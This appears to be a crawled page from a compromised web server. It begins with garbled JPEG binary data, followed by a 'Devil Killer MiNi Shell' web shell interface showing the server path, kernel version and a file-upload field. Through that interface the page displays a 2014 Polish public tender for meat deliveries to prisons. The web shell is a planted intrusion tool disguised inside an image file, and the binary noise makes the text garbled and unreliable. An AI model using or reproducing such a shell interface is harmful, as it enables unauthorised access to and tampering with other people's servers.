JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140922/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140922/200749-N-2014.html

<p class="kh_header"><b>Gdańsk: znak sprawy: 11/2014/BIGB O/POTULICE  Dostawy mięsa i art. mięsnych:</b><br>
<b>Numer ogłoszenia: 200749 - 2014; data zamieszczenia: 22.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igbbaltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> znak sprawy: 11/2014/BIGB O/POTULICE  Dostawy mięsa i art. mięsnych:.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Kiełbasa toruńska (średnio rozdrobniona) Mieso wieprzowe 79%, woda, skrobia ziemniaczana, sól, białko sojowe,wzmacniacz smaku: glutaminian monosodowy, przyprawy i ich aromaty,glukoza, przeciwutleniacz , ilość szacunkowa: 500 kg, nomenklatura CPV:15131130-5
2. Kiełbasa parówkowa  Produkt wieprzowo-drobiowy wędzony parzony SKŁAD: mięso 40 %( w tym:wieprzowe 35%, wołowe 5%),  woda, mięso oddzielone mechanicznie z kurczaka ,tłuszcz wieprzowy, skórki wieprzowe, skórki z kurczaka, skrobia ziemniaczana, sól, przyprawy(drobno rozdrobniona), ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5
3. Kiełbasa zwyczajna z dziczyzną (średnio rozdrobniona) typu Sokołów, ilość szacunkowa: 600 kg, nomenklatura CPV: 15131130-5
4. Kiełbasa zwyczajna (średnio rozdrobniona),Kiełbasa wieprzowa z wołowiną  średnio rozdrobniona , wędzona , parzona  Skład: mięso wieprzowe(61%) , woda , mięso wołowe(8%), tłuszcz wieprzowy, skrobia ziemniaczana ,sól spożywcza ,białko sojowe ,błonnik roślinny , przyprawy ilość szacunkowa: 500 kg, nomenklatura CPV: 15131130-5
5. Kiełbasa studencka (średnio rozdrobniona),mięso wieprzowe 69%,woda,mięso wieprzowe oddzielone mechanicznie , skrobia ziemniaczana, sól ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5
6. Kiełbasa podwawelska extra :mięso wieprzowe (66 %) , woda , tłuszcz wieprzowy ,skrobia ziemniaczana , mięso wołowe (2%),  sól spożywcza , białko sojowe , stabilizator: E451, błonnik sojowy , czosnek suszony , przyprawy, ekstrakty przypraw (średnio rozdrobniona) typu Sokołów, ilość szacunkowa: 700 kg, nomenklatura CPV: 15131130-5
7. Kabanosy drobiowe, (średnio rozdrobnione), parzone, podsuszane, długość batonów około 25 cm, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5
8. Kabanosy wieprzowe, (średnio rozdrobnione), parzone, podsuszane, długość batonów około 25 cm, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5
9. Kiełbasa swojska pieczona Kiełbasa wieprzowa  średnio rozdrobniona ,wędzona , pieczona  
skład : mięso wieprzowe (96%) , sól spożywcza , czosnek , błonnik pszenny , cukier , laktoza , hydrolizat białka sojowego , przyprawy (średnio rozdrobniona), ilość szacunkowa: 600 kg, nomenklatura CPV: 15131130-5
10. Kiełbasa polska wędzona (średnio rozdrobniona) ilość szacunkowa: 620 kg, nomenklatura CPV: 15131130-5
11. Kiełbasa żywiecka wieprzowa (średnio rozdrobniona), wędzona, parzona, w opakowaniach hermetycznie zamkniętych od 0,4 kg do 0,6 kg, ilość szacunkowa: 400 kg, nomenklatura CPV: 15131130-5
12. Kaszanka w naturalnym jelicie wieprz. cienkim, o cechach typowych dla tego rodzaju produktu. Cecha charakterystyczną jest dodatek naturalnych przypraw pakowana w opakowaniach od 800-1000g. (drobno rozdrobniona), ilość szacunkowa: 200 kg, nomenklatura CPV: 15131134-3
13. Boczek wędzony pieczony, w opakowaniach hermetycznie zamkniętych,skład :boczek wieprzowy (91%) ,sól ilość szacunkowa: 500 kg, nomenklatura CPV: 15131200-7
14. Udko z kurczaka wędzone, w opakowaniach hermetycznie zamkniętych, ilość szacunkowa: 500 kg, nomenklatura CPV: 15131200-7
15. Golonka pieczona, w opakowaniach hermetycznie zamkniętych,Wędzonka otrzymana z golonki wieprzowej bez kości peklowana , pieczona układ tłuszczu , mięsa i skóry właściwy dla golonki wieprzowej, barwa  mięsa ciemnoróżowa  , tłuszczu jasnokremowa do kremowej , skóry pomarańczowa. Mięśnie luźno związane z tłuszczem i skórą , konsystencja krucha , w miarę soczysta. Smak i zapach charakterystyczne dla golonki wieprzowej peklowanej , pieczonej Smak umiarkowanie słony , przyprawy wyraźnie wyczuwalne Wędzonka otrzymana z golonki wieprzowej bez kości peklowana , pieczona Wyrób  bezosłonkowy ilość szacunkowa: 600 kg, nomenklatura CPV: 15131400-9
16. Golonka wieprzowa świeża od 1,20 kg do 1,30 kg, ilość szacunkowa: 300 kg, nomenklatura CPV:15131400-9
17. Boczek świeży, luz, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5;
18. Mięso wołowe extra b/k kl. I, luz, ilość szacunkowa: 300 kg, nomenklatura CPV: 15111000-9
19. Mięso gulaszowe wołowe kl. II, luz, ilość szacunkowa: 100 kg, nomenklatura CPV: 15111190-7
20. Filet z indyka świeży, luz, ilość szacunkowa: 200 kg, nomenklatura CPV: 15112220-4
21. Żołądki drobiowe świeże, luz, ilość szacunkowa: 100 kg, nomenklatura CPV: 15112300-1
22. Kiełbasa biała parzona (średnio rozdrobniona), SKŁADNIKI:mięso 57% (w tym:mięso wieprzowe 34%,mięso z kurczaka 23%),gramatura od 1 kg do 1,2 kg, luz, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5
23. Kiełbasa biała parzona (średnio rozdrobniona), w opakowaniach hermetycznie zamkniętych SKŁAD: mięso 61% (w tym: mięso wieprzowe 37%, mięso z kurczaka 24%), woda, tłuszcz wieprzowy, skórki wieprzowe, błonnik sojowy, sól, przyprawy od 0,4 kg do 0,6 kg, luz, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5;
24. Szynka wieprzowa parzona skład :  mięso wieprzowe( 74 %) , woda , sól spożywcza o gramaturze od 1,5 kg do 2 kg, luz, ilość szacunkowa: 100 kg, nomenklatura CPV: 15131130-5
25. Kaszanka blok od 1,2 kg do 1,4 kg, luz, ilość szacunkowa: 100 kg, nomenklatura CPV: 15131134-3
26. Kiełbasa śląska, średnio rozdrobniona ,wędzona , parzona  skład: mięso wieprzowe (68 %) ,woda , mięso wołowe (5%), tłuszcz wieprzowy ,  skrobia ziemniaczana , sól spożywcza, białko sojowe , błonnik roślinny w opakowaniach hermetycznie zamkniętych od 0,3 kg do 0,5 kg, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5
27. Boczek wędzony bez żeberek, ilość szacunkowa: 200 kg, nomenklatura CPV: 15131200-7
28. Schab b/k, ilość szacunkowa: 400 kg, nomenklatura CPV: 15113000-3;
29. Wątroba drobiowa, ilość szacunkowa: 600 kg, nomenklatura CPV: 15114000-0;
30. Udka z kurczaka, świeże, ilość szacunkowa: 400 kg, nomenklatura CPV: 15131500-0
31. Kości schabowe, świeże, ilość szacunkowa: 400 kg, nomenklatura CPV: 15113000-3
32. Karkówka bez kości, bez skóry ilość szacunkowa: 300 kg, nomenklatura CPV: 15113000-3
33. Łopatka, bez kości, bez skóry ilość szacunkowa: 300 kg, nomenklatura CPV: 15113000-3
34. Pierś z kurczaka z kością, ilość szacunkowa: 400 kg, nomenklatura CPV: 15131500-0
35. Kurczak świeży, ilość szacunkowa: 300 kg, nomenklatura CPV: 15112100-7;
36. Skrzydła drobiowe świeże, ilość szacunkowa: 200 kg, nomenklatura CPV: 15131500-0
37. Flaki wieprzowe lub wołowo-wieprzowe w pomidorach, w opakowaniach foliowych od 0,8 kg do 1 kg, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131400-9;
38. Flaki wieprzowe krojone obgotowane, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131640-3
39. Mięso mielone (wieprzowo-wołowe), ilość szacunkowa: 600 kg, nomenklatura CPV: 15113000-3
40. Żeberka świeże, ilość szacunkowa: 500 kg, nomenklatura CPV: 15113000-3;
41. Parówki hermetycznie pakowane w opakowaniach jednostkowych od 200 g do 250 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131130-5
42. Salami w plastrach w obsypce Teksas, Kiełbasa drobno rozdrobniona, surowa, suszona, wieprzowa,składniki: mięso wieprzowe, tłuszcz wieprzowy, tkanka łączna wieprzowa, posypka pieprz  zielony (6%), sól,  przyprawa(Produkt może zawierać śladowe ilości: glutenu, selera, gorczycy, soi, pochodnych mleka. Do wytworzenia 100 g produktu zużyto 106 g mięsa wieprzowego w opakowaniach jednostkowych, hermetycznie zamkniętych od 100 g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131230-6
43. Boczek w plastrach, w opakowaniach jednostkowych, hermetycznie zamkniętych od 100 g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131130-5
44. Polędwica sopocka w plastrach, Wędzonka otrzymana z peklowanej polędwicy wieprzowej z okr. Tłuszczu do 0,5 cm i pozostawioną ok. 1,5 cm warstwą mięsa od boczku, parzona, wędzona. w opakowaniach jednostkowych,skład : polędwica wieprz. z/tł (71%) hermetycznie zamkniętych od 100 g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131130-5
45. Baleron gotowany w plastrach, w opakowaniach jednostkowych,Wędzonka wędzona, parzona, otrzymana z peklowanych karczków wieprzowych  Skład: mięso z karkówki wiep.(76%) hermetycznie zamkniętych od 100g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131130-5
46. Salami w plastrach, w opakowaniach jednostkowych, hermetycznie zamkniętych Salami kiełbasa drobno rozdrobniona, surowa, suszona, wieprzowa składniki: mięso wieprzowe, tłuszcz wieprzowy, tkanka łączna wieprzowa, sól, przyprawa Do wytworzenia 100g produktu zużyto 104 mięsa wieprzowego  od 100 g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131230-6
47. Szynka gotowana w plastrach, w opakowaniach jednostkowych, hermetycznie zamkniętych od 100 g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131130-5
48. Karczek małopolski w opakowaniach jednostkowych, hermetycznie zamkniętych aluminiowych puszkach.Konserwa wieprzowa grubo rozdrobniona sterylizowana Skład: mięso wieprzowe (74%), woda, skrobia modyfikowana , sól spożywcza, cukier, przyprawy, czosnek , Blok kształtu użytej puszki otoczony galaretą , dopuszczalne niewielkie poszarzenie oraz nieznaczna ilość wytopionego tłuszczu od strony wieczka lub denka. Barwa bloku- różowa , tłuszczu biała , galarety jasnosłomkowa. Blok dość ścisły , stanowi jednolitą całość , galareta stała w temp.18 C. Grubo rozdrobnione kawalki mięsa równomiernie rozmieszczone na przekroju. Barwa mięsa różowa do ciemnoróżowej , tłuszczu biała , dopuszczalny odcień różowy.od 120 g do 150 g, ilość szacunkowa: 600 opakowań, nomenklatura CPV: 15131130-5
49. Smalczyk wiejski typu Sokołów, w opakowaniach jednostkowych, hermetycznie zamkniętych-aluminiowych puszkach od 120 g do 150 g, ilość szacunkowa: 600 opakowań, nomenklatura CPV: 15131130-5
50. Smalczyk wiejski ze skwarkami typu Sokołów, w opakowaniach jednostkowych, hermetycznie zamkniętych aluminiowych puszkach od 120 g do 150 g, ilość szacunkowa: 600 opakowań, nomenklatura CPV: 15131130-5
51. Szynka delikatesowa typu Sokołów, w opakowaniach jednostkowych, hermetycznie zamkniętych aluminiowych puszkach- szynka  delikatesowa     konserwa sterylizowana                                    
Skład: mięso wieprzowe (58 %), woda , sól spożywcza Blok kształtu użytej foremki aluminiowej otoczony galaretą, dobrze związany .Barwa bloku :różowa , galarety słomkowo-żółta , klarowna , dopuszczalne zmętnienie. Konsystencja bloku ścisła. Grubo rozdrobnione kawałki mięsa wieprzowego związane masa wiążącą , konsystencja jędrna , związanie dobre. Dopuszczalna kontrastowość wynikająca z użytego surowca.od 120 g do 150 g, ilość szacunkowa: 600 opakowań, nomenklatura CPV: 15131130-5
52. Gulasz angielski w opakowaniach jednostkowych, hermetycznie zamkniętych aluminiowych puszkach Mięso wieprzowe chude grubo rozdrobnione , wieprzowe tłuste średnio rozdrobnione , wieprzowina ścięgnista i skórki drobno rozdrobnione. Barwa mięsa różowa, skórki i przyprawy nie powinny być widoczne.  Mielonka wieprzowa sterylizowana                              Skład: mięso wieprzowe ( 86 %)od 120 g do 150 g, ilość szacunkowa: 500 opakowań, nomenklatura CPV: 15131130-5;
53. Pasztecik typu Sokołów - różne rodzaje, w opakowaniach jednostkowych,aluminiowych puszkach Konserwa wieprzowa sterylizowana Skład : woda , tłuszcz wieprzowy, mięso wieprzowe (18%), skórki wieprzowe ,wątroba wieprzowa(7%), hermetycznie zamkniętych od 120 g do 150 g, ilość szacunkowa: 1000 opakowań, nomenklatura CPV: 15131130-5
54. Polędwiczki wieprzowe  świeże  z główką ilość szacunkowa: 300 kg, nomenklatura CPV: 15131400-9
55. Filet wędzony z piersi kurczaka , ilość szacunkowa: 1000 kg, nomenklatura CPV: 15131500-0
56. Filet wędzony  z piersi indyka  ilość szacunkowa: 300 kg, nomenklatura CPV: 15112120-3
57. Konserwa wieprzowa turystyczna, puszka samootwieralna 200 g, Mielonka  wieprzowa sterylizowana skład : mieso wieprzowe (37%), woda , tłuszcz wieprzowy , skórki wieprzowe, mieso wieprzowe lość szacunkowa: 600 szt., nomenklatura CPV: 15131000-5

58. Konserwa wieprzowa turystyczna,  Mielonka sterylizowana
   Skład: mięso wieprzowe (31%) , woda , tłuszcz wieprzowy , skórki wieprzowe ,  mięso drobiowe puszka samootwieralna 300 g, ilość szacunkowa: 600 szt., nomenklatura CPV: 15131000-5
59. Mięso - szynka świeża, luz, ilość szacunkowa: 300 kg, nomenklatura CPV: 15131410-2
60. Kiełbasa myśliwska wędzona, pieczona i podsuszana, zawierająca zmielone ziarenka jałowca, czarnego pieprzu i gorczycy,Skład: mięso: wieprzowe, wołowe; sól, przyprawy, przeciwutleniacz - askorbinian sodu, substancja konserwująca - azotyn sodu     ilość szacunkowa: 300 kg, nomenklatura CPV: 15131130-5.
61. Słonina bez skóry w opakowaniach od 2-2,5 kg CPV15131400-9, 
62. Polędwica wołowa świeża w opakowaniach od 1,00-1,5 kg  CPV :15111100-0 

Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku, z długim okresem przydatności do spożycia dla danego artykułu, w zamkniętych i nieuszkodzonych opakowaniach (nie dotyczy art. dostarczanych luzem np. poz. 59), które posiadają: kod kreskowy oraz nadrukowaną informację o: nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz gramaturze (g, kg).
Wędliny - zapach swoisty, charakterystyczny dla danego asortymentu wędlin, bez oznak zjełczenia tłuszczu, oślizgłości i pleśni na jej powierzchni.
W sytuacji odmiennego nazewnictwa poszczególnych artykułów mięsnych, zamawiający dopuszcza możliwość zastosowania nazw własnych (firmowych) producenta, ale wyłącznie w przypadku, kiedy wykonawca nie sprzedaje artykułu o wyżej wymienionej nazwie, a oferowany przez niego wyrób jest z nim tożsamy w procesie produkcji, składu, grupy technologicznej oraz odpowiada danej normie. Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry tj. gramaturę lub pojemność, albo ilość sztuk w opakowaniu taką samą jak opisany przez zamawiającego dany przedmiot zamówienia. W przypadku, kiedy przedmiot zamówienia został przez zamawiającego opisany za pomocą przedstawienia jego składu, to produkt równoważny oferowany przez wykonawcę w swoim składzie posiada takie same składniki jakie w opisie przedmiotu zamówienia zawarł zamawiający. Jeżeli opis przedmiotu zamówienia oprócz składu posiada również opis procentowego (%) udziału danego składnika w składzie artykułu, to produkt równoważny oferowany przez wykonawcę w swoim składzie posiada te same składniki, a udział procentowy (%) poszczególnych składników nie może być większy lub mniejszy niż 10% od opisanego przez zamawiającego procentowego (%) udziału danego składnika w składzie artykułu.  Ponadto inne parametry produktu równoważnego oferowanego przez wykonawcę, w szczególności dotyczące smaku, aromatu, koloru, konsystencji nie mogą znacząco różnić się od artykułu opisanego przez zamawiającego. Na wykonawcy ciąży udowodnienie, że produkt równoważny spełnia wymogi i opis określony przez zamawiającego. W przypadku oferowania produktów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 5 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
1. Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, zgodnie z wymogami sanitarnymi w sposób zapobiegający utracie walorów użytkowych, smakowych i odżywczych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1
b) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4
c) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27
e) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17
h) Zakład Karny  w Inowrocławiu, ul. Gabriela Narutowicza 46
i) Aresztu Śledczego w Toruniu, ul. Piekary 53
j) Zakładu Karnego we Włocławku, ul. Bartnicka 10.
k) Oddział Zewnętrzny Aresztu Śledczego w Bydgoszczy, ul. Toruńska  276
l) Kawiarnia ODK Zacisze, 89-526 Lubiewo
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.11.11.90-7, 15.13.11.34-3, 15.13.12.00-7, 15.13.14.00-9, 15.11.11.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
